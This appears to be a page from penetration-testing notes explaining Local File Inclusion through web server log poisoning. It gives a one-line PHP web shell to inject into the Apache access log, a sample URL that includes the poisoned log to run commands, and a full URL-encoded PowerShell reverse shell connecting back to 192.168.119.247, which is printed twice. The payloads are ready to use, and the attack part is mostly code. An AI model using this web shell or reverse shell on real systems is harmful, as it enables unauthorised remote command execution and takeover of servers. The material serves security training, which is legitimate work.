Local File Inclusion

This is one of the two vulnerabilities that can open up the server to remote code execution. In this method the attacker has to be able to 2 things,

Contaminate any residing file with code that can enable LFI
Exploit directory traversal to access the file to execute the code

One of the popular methods is to contaminate the webserver's log file with a piece of code and then access the log file that will trigger the execution of the code.

Connect to the webserver using netcat and if the server is using php, then contaminate the log file with the following code,

<?php echo '<pre>' . shell_exec($_GET['cmd']) . '</pre>';?>

Depending on the scripting language used on the server side, the code can be modified.

Now, access the log file using directory traveral and include the command to be executed as follows in the URL (this application is susceptible to this format, this could change based on the application that you are testing),

http://192.168.1.10/pricinglist.php?file=c:\xampp\apache\logs\access.log&cmd=ipconfig

The above command will fetch the ip of the system and display it.

Similarly, other commands can be executed. If a reverse shell has to be executed, then the command has to be URL encoded since this URL request passes through the browser to the web application, which eventually executes it on the system. URL encoding of a command can be easily done by visiting one of the online tools for URL encoding.

URL encoded powershell reverse shell looks like this,

powershell%20-c%20%22%24client%20%3D%20New-Object%20System.Net.Sockets.TCPClient%28%27192.168.119.247%27%2C443%29%3B%24stream%20%3D%20%24client.GetStream%28%29%3B%5Bbyte%5B%5D%5D%24bytes%20%3D%200..65535%7C%25%7B0%7D%3Bwhile%28%28%24i%20%3D%20%24stream.Read%28%24bytes%2C%200%2C%20%24bytes.Length%29%29%20-ne%200%29%7B%3B%24data%20%3D%20%28New-Object%20-TypeName%20System.Text.ASCIIEncoding%29.GetString%28%24bytes%2C0%2C%20%24i%29%3B%24sendback%20%3D%20%28iex%20%24data%202%3E%261%20%7C%20Out-String%20%29%3B%24sendback2%20%3D%20%24sendback%20%2B%20%27PS%20%27%20%2B%20%28pwd%29.Path%20%2B%20%27%3E%20%27%3B%24sendbyte%20%3D%20%28%5Btext.encoding%5D%3A%3AASCII%29.GetBytes%28%24sendback2%29%3B%24stream.Write%28%24sendbyte%2C0%2C%24sendbyte.Length%29%3B%24stream.Flush%28%29%7D%3B%24client.Close%28%29%22

Other Resources

PreviousDirectory Traversal NextRemote File Inclusion

Last updated 2 years ago

Was this helpful?

powershell%20-c%20%22%24client%20%3D%20New-Object%20System.Net.Sockets.TCPClient%28%27192.168.119.247%27%2C443%29%3B%24stream%20%3D%20%24client.GetStream%28%29%3B%5Bbyte%5B%5D%5D%24bytes%20%3D%200..65535%7C%25%7B0%7D%3Bwhile%28%28%24i%20%3D%20%24stream.Read%28%24bytes%2C%200%2C%20%24bytes.Length%29%29%20-ne%200%29%7B%3B%24data%20%3D%20%28New-Object%20-TypeName%20System.Text.ASCIIEncoding%29.GetString%28%24bytes%2C0%2C%20%24i%29%3B%24sendback%20%3D%20%28iex%20%24data%202%3E%261%20%7C%20Out-String%20%29%3B%24sendback2%20%3D%20%24sendback%20%2B%20%27PS%20%27%20%2B%20%28pwd%29.Path%20%2B%20%27%3E%20%27%3B%24sendbyte%20%3D%20%28%5Btext.encoding%5D%3A%3AASCII%29.GetBytes%28%24sendback2%29%3B%24stream.Write%28%24sendbyte%2C0%2C%24sendbyte.Length%29%3B%24stream.Flush%28%29%7D%3B%24client.Close%28%29%22